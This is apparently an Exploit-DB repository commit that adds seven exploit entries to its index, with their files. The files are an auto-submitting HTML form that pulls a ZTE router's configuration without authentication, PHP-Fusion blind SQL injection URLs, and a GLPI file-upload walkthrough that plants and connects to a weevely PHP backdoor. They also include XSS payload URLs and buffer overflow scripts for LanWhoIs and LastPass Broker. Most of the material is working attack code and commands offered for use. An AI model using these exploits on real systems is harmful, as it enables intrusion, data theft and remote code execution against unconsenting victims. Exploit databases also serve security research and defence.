DB: 2015-10-07

7 new exploits
This commit is contained in:
Offensive Security 2015-10-07 05:02:02 +00:00
parent de10ad30b5
commit fb214069db
10 changed files with 416 additions and 12 deletions

View file

@ -12912,7 +12912,7 @@ id,file,description,date,author,platform,type,port
14743,platforms/windows/local/14743.c,"avast! <= 5.0.594 license files DLL Hijacking Exploit (mfc90loc.dll)",2010-08-25,diwr,windows,local,0 14743,platforms/windows/local/14743.c,"avast! <= 5.0.594 license files DLL Hijacking Exploit (mfc90loc.dll)",2010-08-25,diwr,windows,local,0
14748,platforms/windows/local/14748.txt,"uTorrent - DLL Hijacking Vulnerabilities",2010-08-25,Dr_IDE,windows,local,0 14748,platforms/windows/local/14748.txt,"uTorrent - DLL Hijacking Vulnerabilities",2010-08-25,Dr_IDE,windows,local,0
14750,platforms/windows/local/14750.txt,"VLC Media Player DLL Hijacking Exploit (wintab32.dll)",2010-08-25,Secfence,windows,local,0 14750,platforms/windows/local/14750.txt,"VLC Media Player DLL Hijacking Exploit (wintab32.dll)",2010-08-25,Secfence,windows,local,0
14751,platforms/windows/local/14751.txt,"Microsoft Vista BitLocker Drive Encryption API Hijacking Exploit (fveapi.dll)",2010-08-25,"Beenu Arora",windows,local,0 14751,platforms/windows/local/14751.txt,"Microsoft Vista - BitLocker Drive Encryption API Hijacking Exploit (fveapi.dll)",2010-08-25,"Beenu Arora",windows,local,0
14752,platforms/windows/local/14752.c,"Roxio Photosuite 9 DLL Hijacking Exploit (homeutils9.dll)",2010-08-25,"Beenu Arora",windows,local,0 14752,platforms/windows/local/14752.c,"Roxio Photosuite 9 DLL Hijacking Exploit (homeutils9.dll)",2010-08-25,"Beenu Arora",windows,local,0
14756,platforms/windows/local/14756.c,"Safari 5.0.1 - DLL Hijacking Exploit (dwmapi.dll)",2010-08-25,Secfence,windows,local,0 14756,platforms/windows/local/14756.c,"Safari 5.0.1 - DLL Hijacking Exploit (dwmapi.dll)",2010-08-25,Secfence,windows,local,0
14753,platforms/windows/local/14753.c,"InterVideo WinDVD 5 DLL Hijacking Exploit (cpqdvd.dll)",2010-08-25,"Beenu Arora",windows,local,0 14753,platforms/windows/local/14753.c,"InterVideo WinDVD 5 DLL Hijacking Exploit (cpqdvd.dll)",2010-08-25,"Beenu Arora",windows,local,0
@ -23061,7 +23061,7 @@ id,file,description,date,author,platform,type,port
25909,platforms/php/webapps/25909.txt,"Mensajeitor 1.8.9 IP Parameter HTML Injection Vulnerability",2005-06-27,Megabyte,php,webapps,0 25909,platforms/php/webapps/25909.txt,"Mensajeitor 1.8.9 IP Parameter HTML Injection Vulnerability",2005-06-27,Megabyte,php,webapps,0
25910,platforms/asp/webapps/25910.txt,"Community Server Forums 'SearchResults.aspx' Cross-Site Scripting Vulnerability",2005-06-28,abducter_minds@yahoo.com,asp,webapps,0 25910,platforms/asp/webapps/25910.txt,"Community Server Forums 'SearchResults.aspx' Cross-Site Scripting Vulnerability",2005-06-28,abducter_minds@yahoo.com,asp,webapps,0
25911,platforms/windows/dos/25911.py,"BisonFTP 4R1 - Remote Denial of Service Vulnerability",2005-06-28,fRoGGz,windows,dos,0 25911,platforms/windows/dos/25911.py,"BisonFTP 4R1 - Remote Denial of Service Vulnerability",2005-06-28,fRoGGz,windows,dos,0
25912,platforms/windows/local/25912.c,"Windows NT/2K/XP/2K3/Vista/2K8/7/8 - EPATHOBJ Local Ring - Exploit",2013-06-03,"Tavis Ormandy",windows,local,0 25912,platforms/windows/local/25912.c,"Windows NT/2K/XP/2K3/Vista/2K8/7/8 - EPATHOBJ Local Ring Exploit",2013-06-03,"Tavis Ormandy",windows,local,0
25913,platforms/asp/webapps/25913.txt,"Hosting Controller 6.1 Error.ASP Cross-Site Scripting Vulnerability",2005-06-28,"Ashiyane Digital Security Team",asp,webapps,0 25913,platforms/asp/webapps/25913.txt,"Hosting Controller 6.1 Error.ASP Cross-Site Scripting Vulnerability",2005-06-28,"Ashiyane Digital Security Team",asp,webapps,0
25914,platforms/asp/webapps/25914.txt,"Dynamic Biz Website Builder (QuickWeb) 1.0 Login.ASP SQL Injection Vulnerability",2005-06-28,basher13,asp,webapps,0 25914,platforms/asp/webapps/25914.txt,"Dynamic Biz Website Builder (QuickWeb) 1.0 Login.ASP SQL Injection Vulnerability",2005-06-28,basher13,asp,webapps,0
25915,platforms/php/webapps/25915.py,"PHD Help Desk 2.12 - SQL Injection Vulnerability",2013-06-03,drone,php,webapps,0 25915,platforms/php/webapps/25915.py,"PHD Help Desk 2.12 - SQL Injection Vulnerability",2013-06-03,drone,php,webapps,0
@ -29372,7 +29372,7 @@ id,file,description,date,author,platform,type,port
32588,platforms/php/webapps/32588.txt,"BoutikOne CMS 'search_query' Parameter Cross-Site Scripting Vulnerability",2008-11-17,d3v1l,php,webapps,0 32588,platforms/php/webapps/32588.txt,"BoutikOne CMS 'search_query' Parameter Cross-Site Scripting Vulnerability",2008-11-17,d3v1l,php,webapps,0
32621,platforms/php/remote/32621.rb,"SePortal SQLi - Remote Code Execution",2014-03-31,metasploit,php,remote,80 32621,platforms/php/remote/32621.rb,"SePortal SQLi - Remote Code Execution",2014-03-31,metasploit,php,remote,80
32589,platforms/php/webapps/32589.html,"Kimson CMS 'id' Parameter Cross-Site Scripting Vulnerability",2008-11-18,md.r00t,php,webapps,0 32589,platforms/php/webapps/32589.html,"Kimson CMS 'id' Parameter Cross-Site Scripting Vulnerability",2008-11-18,md.r00t,php,webapps,0
32590,platforms/windows/local/32590.c,"Microsoft Windows Vista 'iphlpapi.dll' Local Kernel Buffer Overflow Vulnerability",2008-11-19,"Marius Wachtler",windows,local,0 32590,platforms/windows/local/32590.c,"Microsoft Windows Vista - 'iphlpapi.dll' Local Kernel Buffer Overflow Vulnerability",2008-11-19,"Marius Wachtler",windows,local,0
32591,platforms/hardware/remote/32591.txt,"3Com Wireless 8760 Dual-Radio 11a/b/g PoE Multiple Security Vulnerabilities",2008-11-19,"Adrian Pastor",hardware,remote,0 32591,platforms/hardware/remote/32591.txt,"3Com Wireless 8760 Dual-Radio 11a/b/g PoE Multiple Security Vulnerabilities",2008-11-19,"Adrian Pastor",hardware,remote,0
32592,platforms/php/webapps/32592.txt,"Easyedit CMS subcategory.php intSubCategoryID Parameter SQL Injection",2008-11-19,d3v1l,php,webapps,0 32592,platforms/php/webapps/32592.txt,"Easyedit CMS subcategory.php intSubCategoryID Parameter SQL Injection",2008-11-19,d3v1l,php,webapps,0
32593,platforms/php/webapps/32593.txt,"Easyedit CMS page.php intPageID Parameter SQL Injection",2008-11-19,d3v1l,php,webapps,0 32593,platforms/php/webapps/32593.txt,"Easyedit CMS page.php intPageID Parameter SQL Injection",2008-11-19,d3v1l,php,webapps,0
@ -34686,3 +34686,10 @@ id,file,description,date,author,platform,type,port
38395,platforms/jsp/webapps/38395.txt,"ManageEngine ServiceDesk Plus <= 9.1 build 9110 - Path Traversal",2015-10-05,xistence,jsp,webapps,8080 38395,platforms/jsp/webapps/38395.txt,"ManageEngine ServiceDesk Plus <= 9.1 build 9110 - Path Traversal",2015-10-05,xistence,jsp,webapps,8080
38399,platforms/windows/dos/38399.py,"LanSpy 2.0.0.155 - Buffer Overflow",2015-10-05,hyp3rlinx,windows,dos,0 38399,platforms/windows/dos/38399.py,"LanSpy 2.0.0.155 - Buffer Overflow",2015-10-05,hyp3rlinx,windows,dos,0
38403,platforms/win32/local/38403.txt,"Truecrypt 7 / VeraCrypt 1.13 - Drive Letter Symbolic Link Creation Privilege Escalation",2015-10-05,"Google Security Research",win32,local,0 38403,platforms/win32/local/38403.txt,"Truecrypt 7 / VeraCrypt 1.13 - Drive Letter Symbolic Link Creation Privilege Escalation",2015-10-05,"Google Security Research",win32,local,0
38404,platforms/windows/dos/38404.py,"LanWhoIs.exe 1.0.1.120 - Stack Buffer Overflow",2015-10-06,hyp3rlinx,windows,dos,0
38405,platforms/windows/dos/38405.py,"Last PassBroker 3.2.16 - Stack-Based Buffer Overflow",2015-10-06,Un_N0n,windows,dos,0
38406,platforms/php/webapps/38406.txt,"PHP-Fusion <= v7.02.07 - Blind SQL Injection",2015-10-06,"Manuel García Cárdenas",php,webapps,0
38407,platforms/php/webapps/38407.txt,"GLPI 0.85.5 - RCE Through File Upload Filter Bypass",2015-10-06,"Raffaele Forte",php,webapps,0
38408,platforms/php/webapps/38408.txt,"Jaow CMS 'add_ons' Parameter Cross Site Scripting Vulnerability",2013-03-23,Metropolis,php,webapps,0
38409,platforms/hardware/webapps/38409.html,"ZTE ZXHN H108N Unauthenticated Config Download",2015-10-06,"Todor Donev",hardware,webapps,0
38410,platforms/php/webapps/38410.txt,"WordPress Banners Lite Plugin 'wpbanners_show.php' HTML Injection Vulnerability",2013-03-25,"Fernando A. Lagos B",php,webapps,0

Can't render this file because it is too large.

View file

@ -0,0 +1,52 @@
<!--
ZTE ZXHN H108N unauthenticated config download
Copyright 2015 (c) Todor Donev
todor.donev@gmail.com
http://www.ethical-hacker.org/
https://www.facebook.com/ethicalhackerorg
http://pastebin.com/u/hackerscommunity
Tested device:
Model ZXHN H108N
Software Version V3.3.0_MU
Description:
Does not check cookies and credentials on POST
method so attackers could download the config
file without authentication.
\!/\!/\!/
Use at your own Use at your own
risk and educational risk and educational
purpose ONLY! purpose ONLY!
Disclaimer:
This or previous program is for Educational
purpose ONLY. Do not use it without permission.
The usual disclaimer applies, especially the
fact that Todor Donev is not liable for any
damages caused by direct or indirect use of the
information or functionality provided by these
programs. The author or any Internet provider
bears NO responsibility for content or misuse
of these programs or any derivatives thereof.
By using these programs you accept the fact
that any damage (dataloss, system crash,
system compromise, etc.) caused by the use
of these programs is not Todor Donev's
responsibility.
Use at your own Use at your own
risk and educational risk and educational
purpose ONLY! purpose ONLY!
/i\/i\/i\
-->
<html>
<title>ZTE ZXHN H108N unauthenticated config download</title>
<body onload=javascript:document.ethack.submit()>
<p>ZTE ZXHN H108N Exploiting..</p>
<form name="ethack" method="POST" action="http://TARGET/getpage.gch?pid=101" enctype="multipart/form-data">
<input type="hidden" name="config" id="config" value="">
</body>
</html>

86
platforms/php/webapps/38406.txt Executable file
View file

@ -0,0 +1,86 @@
=============================================
MGC ALERT 2015-002
- Original release date: September 18, 2015
- Last revised: October 05, 2015
- Discovered by: Manuel García Cárdenas
- Severity: 7,1/10 (CVSS Base Score)
=============================================
I. VULNERABILITY
-------------------------
Blind SQL Injection in admin panel PHP-Fusion <= v7.02.07
II. BACKGROUND
-------------------------
PHP-Fusion is a lightweight open source content management system (CMS)
written in PHP.
III. DESCRIPTION
-------------------------
This bug was found using the portal with authentication as administrator.
To exploit the vulnerability only is needed use the version 1.0 of the HTTP
protocol to interact with the application. It is possible to inject SQL
code in the variable "status" on the page "members.php".
IV. PROOF OF CONCEPT
-------------------------
The following URL's and parameters have been confirmed to all suffer from
Blind SQL injection.
/phpfusion/files/administration/members.php?aid=99ad64700ec4ce10&sortby=all&status=0
Exploiting with true request (with mysql5):
/phpfusion/files/administration/members.php?aid=99ad64700ec4ce10&sortby=all&status=0'
AND substr(@@version,1,1)='5
Exploiting with false request:
/phpfusion/files/administration/members.php?aid=99ad64700ec4ce10&sortby=all&status=0'
AND substr(@@version,1,1)='4
V. BUSINESS IMPACT
-------------------------
Public defacement, confidential data leakage, and database server
compromise can result from these attacks. Client systems can also be
targeted, and complete compromise of these client systems is also possible.
VI. SYSTEMS AFFECTED
-------------------------
PHP-Fusion <= v7.02.07
VII. SOLUTION
-------------------------
All data received by the application and can be modified by the user,
before making any kind of transaction with them must be validated.
VIII. REFERENCES
-------------------------
https://www.php-fusion.co.uk/
IX. CREDITS
-------------------------
This vulnerability has been discovered and reported
by Manuel García Cárdenas (advidsec (at) gmail (dot) com).
X. REVISION HISTORY
-------------------------
September 18, 2015 1: Initial release
October 10, 2015 2: Revision to send to lists
XI. DISCLOSURE TIMELINE
-------------------------
September 18, 2015 1: Vulnerability acquired by Manuel Garcia Cardenas
September 18, 2015 2: Send to vendor
September 24, 2015 3: Second mail to the verdor without response
October 10, 2015 4: Send to the Full-Disclosure lists
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
XIII. ABOUT
-------------------------
Manuel Garcia Cardenas
Pentester

92
platforms/php/webapps/38407.txt Executable file
View file

@ -0,0 +1,92 @@
# Exploit Title: GLPI 0.85.5 RCE through file upload filter bypass
# Date: September 7th, 2015
# Exploit Author: Raffaele Forte <raffaele@backbox.org>
# Vendor Homepage: http://www.glpi-project.org/
# Software Link: https://forge.glpi-project.org/attachments/download/2093/glpi-0.85.5.tar.gz
# Version: GLPI 0.85.5
# Tested on: CentOS release 6.7 (Final), PHP 5.3.3
I. INTRODUCTION
========================================================================
GLPI is the Information Resource-Manager with an additional
Administration-Interface. You can use it to build up a database with an
inventory for your company (computer, software, printers...). It has
enhanced functions to make the daily life for the administrators easier,
like a job-tracking-system with mail-notification and methods to build a
database with basic information about your network-topology.
II. DESCRIPTION
========================================================================
The application allows users to upgrade their own profile. The user has
the possibility to add a new photo as attachment.
The photo that he uploads will be stored into "GLPI_ROOT/files/_pictures/".
This file, for example named "photo.jpeg", will be directly accessible
through "http://host/GLPI_ROOT/files/_pictures/XXXX.jpeg", where "XXXX"
is an ID automatically generated by the system and visible in the HTML
source code.
Besides, the server does not check the extension of the uploaded file,
but only the first bytes within it, that indicates which kind of file is.
Exploiting this flaw, an attacker may upload a tampered jpeg file that
contains php code placed at the end of the file, so that, just changing
the file extention to ".php", by default the php code will be interpreted!
To trigger this vulnerability it is necessary to have an account.
This vulnerability is a combination of two issues:
- predictable uploaded file names and path
- upload of any kind of file, not limited to images
III. PROOF OF CONCEPT
========================================================================
Generate backdoor:
user@backbox:~$ weevely generate pass123 /tmp/bd.php
user@backbox:~$ file /tmp/photo.jpeg
/tmp/photo.jpeg: JPEG image data, JFIF standard 1.02
user@backbox:~$ cat /tmp/bd.php >> /tmp/photo.jpeg
user@backbox:~$ mv /tmp/photo.jpeg /tmp/photo.php
Upload the new tampered photo in GLPI > Settings
Run terminal to the target:
user@backbox:~$ weevely http://host/GLPI_ROOT/files/_pictures/XXXX.php pass123
IV. BUSINESS IMPACT
========================================================================
By uploading a interpretable php file, an attacker may be able to
execute arbitrary code on the server.
This flaw may compromise the integrity of the system and/or expose
sensitive information.
V. SYSTEMS AFFECTED
========================================================================
GLPI Version 0.85.5 is vulnerable (probably all previous versions)
VI. VULNERABILITY HISTORY
========================================================================
September 7th, 2015: Vulnerability identification
September 25th, 2015: Vendor notification
VII. LEGAL NOTICES
========================================================================
The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. We accept no
responsibility for any damage caused by the use or misuseof this
information.

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/58658/info
Jaow CMS is prone to a cross-site scripting vulnerability.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Jaow CMS 2.4.8 is vulnerable; other versions may also be affected.
http://www.example.com/path/add_ons.php?add_ons=[XSS]

View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/58671/info
The Banners Lite plugin for WordPress is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
http://www.example.com/wordpress/wp-content/plugins/wp-banners-lite/wpbanners_show.php?id=1&cid=a_<script>alert(/XSSProof-of-Concept/)</script>

124
platforms/windows/dos/38404.py Executable file
View file

@ -0,0 +1,124 @@
'''
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AS-LANWHOIS-BUFFER-OVERFLOW-10062015.txt
Vendor:
================================
www.lantricks.com
Product:
================================
LanWhoIs.exe 1.0.1.120
LanWhoIs querys and returns domain (site) holder or IP address informations.
Vulnerability Type:
===================
Buffer Overflow
CVE Reference:
==============
N/A
Vulnerability Details:
======================
LanWhoIs contains a file parsing stack buffer overflow vulnerability. The program has a whois_result.xml
XML file located under the LanWhoIs directory. This file holds results returned from program queries. If
LanWhoIs is installed under c:\ instead of 'Program Files' etc.. on shared PC and a non adminstrator user
has access they can still edit the whois_result.xml, abusing the vuln program and possibly escalate privileges
or run arbitrary code etc.
e.g.
<WhoisResult>
<Result>
<QueryString>216.239.37.99</QueryString>
<ServerName>whois.arin.net</ServerName>
<QueryDate>02.01.2005 16:17:30</QueryDate>
<QueryType>-1</QueryType>
We can exploit the program by injecting malicious payload into the <QueryString> node of the local XML file
causing buffer overflow overwriting both pointers to the NSEH & SEH exception handlers & control EIP at about 676 bytes.
e.g.
<QueryString>AAAAAAAAAAAAAAAAAAAAAAAAAAAAA.....shellcode...etc..</QueryString>
WinDbg stack dump....
(2048.17cc): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** WARNING: Unable to verify checksum for image00400000
*** ERROR: Module load completed but symbols could not be loaded for image00400000
eax=02bdfec8 ebx=02bdff14 ecx=02bdfecc edx=41414141 esi=00000000 edi=00000000
eip=00404bc8 esp=02bdfc04 ebp=02bdfecc iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
image00400000+0x4bc8:
00404bc8 8b4af8 mov ecx,dword ptr [edx-8] ds:002b:41414139=????????
0:011> !exchain
02bdfed4: 52525252
Invalid exception stack at 42424242
registers...
EAX 00000000
ECX 52525252
EDX 7714B4AD ntdll.7714B4AD
EBX 00000000
ESP 04D0F668
EBP 04D0F688
ESI 00000000
EDI 00000000
EIP 52525252
POC code:
==========
Run below script, then copy and insert payload into <QueryString> </QueryString> XML node
and run the application. Next, select the address in the Results window pane and then click Query button
to run a whois lookup or use the 'F3' keyboard cmd to execute and KABOOOOOOOOOOOOOOOM!!!
'''
file=open("C:\\hyp3rlinx\\LanTricks\LanWhoIs\\HELL","w")
payload="A"*676+"BBBB"+"RRRR" <--------------------#KABOOOOOOOOOOOOOOOOOOM!!!
file.write(payload)
file.close()
'''
Public Disclosure:
===================
October 6, 2015
Exploitation Technique:
=======================
Local
Tested on Windows 7 SP1
Vulnerable Parameter:
======================
QueryString
===========================================================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere.
by hyp3rlinx
'''

28
platforms/windows/dos/38405.py Executable file
View file

@ -0,0 +1,28 @@
'''
********************************************************************************************
# Exploit Title: Last PassBroker Stack-based BOF
# Date: 9/23/2015
# Exploit Author: Un_N0n
# Software Link: https://lastpass.com/download
# Version: 3.2.16
# Tested on: Windows 7 x86(32 BIT)
********************************************************************************************
[Steps to Produce the Crash]:
1- open 'LastPassBroker.exe'.
2- A Input-Box will appear asking for Email and Password,
In password field paste in the contents of crash.txt
3- Hit Login.
~Software will Crash.
[Code to produce crash.txt]:
'''
junk = "A"*66666
file = open("CRASH.txt",'w')
file.write(junk)
file.close()
'''
> Vendor Notified, Fixed in latest Release.
**********************************************************************************************
'''

View file

@ -1,13 +1,12 @@
source: http://www.securityfocus.com/bid/32357/info // source: http://www.securityfocus.com/bid/32357/info
// Microsoft Windows Vista is prone to a buffer-overflow vulnerability because of insufficient boundary checks.
Microsoft Windows Vista is prone to a buffer-overflow vulnerability because of insufficient boundary checks. // Local attackers could exploit this issue to cause denial-of-service conditions. Given the nature of this issue, attackers may also be able to execute arbitrary code with SYSTEM-level privileges, but this has not been confirmed.
Local attackers could exploit this issue to cause denial-of-service conditions. Given the nature of this issue, attackers may also be able to execute arbitrary code with SYSTEM-level privileges, but this has not been confirmed. // Windows Vista SP1 is vulnerable to this issue.
Windows Vista SP1 is vulnerable to this issue. // UPDATE (November 25, 2008): Since this issue may be exploitable only by members of the administrative group, the security implication of this issue may be negated.
UPDATE (November 25, 2008): Since this issue may be exploitable only by members of the administrative group, the security implication of this issue may be negated.
#define _WIN32_WINNT 0x0600 #define _WIN32_WINNT 0x0600
#define WIN32_LEAN_AND_MEAN #define WIN32_LEAN_AND_MEAN

View file

@ -1,8 +1,8 @@
source: http://www.securityfocus.com/bid/38044/info // source: http://www.securityfocus.com/bid/38044/info
Microsoft Windows is prone to a local privilege-escalation vulnerability that occurs in the kernel. // Microsoft Windows is prone to a local privilege-escalation vulnerability that occurs in the kernel.
An attacker can exploit this issue to execute arbitrary code with kernel-level privileges. Successful exploits will result in the complete compromise of affected computers. Failed exploit attempts will cause a denial of service. // An attacker can exploit this issue to execute arbitrary code with kernel-level privileges. Successful exploits will result in the complete compromise of affected computers. Failed exploit attempts will cause a denial of service.
// -------------------------------------------------------- // --------------------------------------------------------
// Windows NtFilterToken() Double Free Vulnerability // Windows NtFilterToken() Double Free Vulnerability